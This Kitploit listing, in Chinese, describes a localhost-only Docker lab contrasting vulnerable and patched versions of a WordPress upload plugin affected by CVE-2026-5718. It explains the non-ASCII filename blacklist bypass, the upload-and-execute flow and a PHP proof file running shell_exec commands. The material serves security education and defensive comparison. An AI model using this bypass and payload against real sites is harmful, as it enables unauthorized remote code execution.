Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5718-Lab — 本地 Docker 实验环境,演示 WordPress 插件中 CVE-2026-5718 任意文件上传漏洞,包含存在漏洞与已修复的服务,便于并排进行漏洞利用与防御分析。 | Kitploit
工具/GitHubGitHub/rootdirective-sec/cve-2026-5718-lab
漏洞分析漏洞利用Web应用程序漏洞利用CTF学习与教育实验室与实践
GitHubrootdirective-sec/cve-2026-5718-lab

CVE-2026-5718-Lab

本地 Docker 实验环境,演示 WordPress 插件中 CVE-2026-5718 任意文件上传漏洞,包含存在漏洞与已修复的服务,便于并排进行漏洞利用与防御分析。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1263个月前尚未审核
分享

CVE-2026-5718 本地 Docker 实验室

仅限本地的易受攻击版与已修补版 Docker 实验室,针对影响 WordPress 插件 Drag and Drop Multiple File Upload for Contact Form 7 的 CVE-2026-5718。

本实验室通过仅在 Docker 环境中运行的最小危害 PHP 执行验证,演示易受攻击版本 1.3.9.6 与已修补版本 1.3.9.7 之间的差异。

适用范围:仅限 localhost / Docker 网络。请勿针对您不拥有或未经明确许可测试的系统使用此 PoC。


执行摘要

CVE-2026-5718 是 Drag and Drop Multiple File Upload for Contact Form 7 中(含)1.3.9.6 及之前版本存在的一个任意文件上传漏洞。

当配置了自定义黑名单类型且文件名包含非 ASCII 字符时,就会触发该问题。在易受攻击版本中,危险的 .php 上传可以绕过预期防护并保持可执行状态。版本 1.3.9.7 通过拒绝相同的上传来修复该问题。

本仓库运行两个本地 WordPress 服务:

  • vuln:位于 http://localhost:8081,插件版本 1.3.9.6
  • patched:位于 http://localhost:8082,插件版本 1.3.9.7

实验室架构

root@kitploit:~
Host
├── http://localhost:8081  -> vulnerable WordPress service
└── http://localhost:8082  -> patched WordPress service

Docker network
├── vuln
├── vuln-db
├── patched
└── patched-db

仓库结构

root@kitploit:~
.
├── docker-compose.yml
├── patched
│   └── Dockerfile
├── poc
│   └── poc.py
│   └── requirements.txt
├── scripts
│   └── seed-wordpress.sh
├── vuln
│   └── Dockerfile

漏洞流程

预置的 Contact Form 7 表单包含一个 Drag and Drop Multiple File Upload 字段:

root@kitploit:~
[mfile upload-file filetypes:* blacklist-types:zip limit:1048576]

PoC 上传一个 PHP 验证文件,其文件名如下:

root@kitploit:~
proof-β.php

β 字符是非 ASCII 字符。这一点很重要,因为该漏洞取决于对非 ASCII 输入的文件名处理方式。

整体流程:

root@kitploit:~
PoC
 ↓
Fetch lab page and extract DnD CF7 AJAX nonce
 ↓
Upload proof-β.php through wp-admin/admin-ajax.php
 ↓
Vulnerable 1.3.9.6 accepts and stores the file as .php
 ↓
PoC requests the uploaded file
 ↓
Vulnerable lab executes the PHP proof as www-data

已修补版本的流程:

root@kitploit:~
PoC
 ↓
Upload the same proof-β.php file
 ↓
Patched 1.3.9.7 rejects the upload
 ↓
No PHP file is stored and no code execution occurs

本地 RCE 验证设计

上传的 PHP 验证文件刻意保持最小化:

root@kitploit:~
<?php
header('Content-Type: text/plain');
echo "CVE_2026_5718_LOCAL_RCE_PROOF\n";
echo "whoami=" . trim(shell_exec('whoami')) . "\n";
echo "id=" . trim(shell_exec('id')) . "\n";
?>

该验证仅运行 whoami 和 id 以显示执行上下文。它不使用反向 shell、持久化、凭据访问、横向移动、网络扫描或破坏性操作。

易受攻击服务有意允许在插件上传目录中执行 PHP,以便在本地实验室中观察到影响。已修补服务保持更安全的行为,在应用程序验证层拒绝该上传。


环境要求

  • Docker Desktop
  • Docker Compose v2
  • Python 3

安装 Python 依赖:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r poc/requirements.txt

构建与运行

从干净状态开始:

root@kitploit:~
docker compose down -v
docker compose up --build -d

检查服务状态:

root@kitploit:~
docker compose ps

打开实验室页面:

root@kitploit:~
http://localhost:8081/cve-2026-5718-lab/
http://localhost:8082/cve-2026-5718-lab/

运行 PoC

针对易受攻击服务运行:

root@kitploit:~
python poc/poc.py --base-url http://localhost:8081

针对已修补服务运行:

root@kitploit:~
python poc/poc.py --base-url http://localhost:8082

PoC 仅接受 localhost 或回环目标。


预期结果

易受攻击服务

预期行为:

  • 上传被接受。
  • 上传的文件名保持为 .php 文件。
  • 上传的 PHP 验证以 Web 服务器用户身份执行。

示例输出:

root@kitploit:~
Upload response:
{"success":true,"data":{"path":"cve5718proof","file":"proof-\u03b2.php"}}

Proof response:
CVE_2026_5718_LOCAL_RCE_PROOF
whoami=www-data
id=uid=33(www-data) gid=33(www-data) groups=33(www-data)

[result] VULNERABLE behavior observed: uploaded PHP proof executed.

已修补服务

预期行为:

  • 相同的上传会被拒绝。
  • PHP 验证不会作为可执行文件被存储。
  • 不会发生代码执行。

示例输出:

root@kitploit:~
Upload response:
{"success":false,"data":"Uploaded file is not allowed for file type"}

[result] Upload rejected by the application.
[result] Reason: Uploaded file is not allowed for file type

安全说明

本实验室刻意限制为仅用于本地测试。

该 PoC:

  • 阻止非 localhost 目标,
  • 不使用反向 shell,
  • 不执行持久化,
  • 不读取机密,
  • 不扫描网络,
  • 仅在易受攻击容器内执行 whoami 和 id。

易受攻击服务放宽上传目录中的 PHP 执行限制,仅仅是为了让本地验证效果可被观察到。请勿将该配置复制到生产环境。


清理

停止容器:

root@kitploit:~
docker compose down

移除容器和卷:

root@kitploit:~
docker compose down -v

删除 Python 虚拟环境:

root@kitploit:~
rm -rf .venv

参考资料

  • NVD:CVE-2026-5718 https://nvd.nist.gov/vuln/detail/CVE-2026-5718

  • Patchstack 公告:WordPress Drag and Drop Multiple File Upload for Contact Form 7 插件 <= 1.3.9.6 - 通过非 ASCII 文件名黑名单绕过实现未认证任意文件上传 https://patchstack.com/database/wordpress/plugin/drag-and-drop-multiple-file-upload-contact-form-7/vulnerability/wordpress-drag-and-drop-multiple-file-upload-for-contact-form-7-plugin-1-3-9-6-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass-vulnerability

  • Wordfence Intelligence:Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.9.6 - 通过非 ASCII 文件名黑名单绕过实现未认证任意文件上传 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7/drag-and-drop-multiple-file-upload-for-contact-form-7-1396-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass

  • GitHub Advisory Database:GHSA-xj7v-jqv6-v48w https://github.com/advisories/GHSA-xj7v-jqv6-v48w

  • WordPress.org 插件页面:Drag and Drop Multiple File Upload for Contact Form 7 https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/

  • 插件厂商页面:Drag & Drop Multiple File Upload for Contact Form 7 https://www.codedropz.com/drag-drop-multiple-file-upload-for-contact-form-7/


免责声明

本仓库仅用于教育和防御性安全研究。其设计为仅通过 Docker 在 localhost 上运行。请勿将 PoC 用于公共或第三方系统。

下载工具
服务用途主机端口版本
vuln易受攻击的 WordPress 实验室8081插件 1.3.9.6
patched已修补的 WordPress 实验室8082插件 1.3.9.7
vuln-db易受攻击服务的 MySQL 数据库internalMySQL 8.0
patched-db已修补服务的 MySQL 数据库internalMySQL 8.0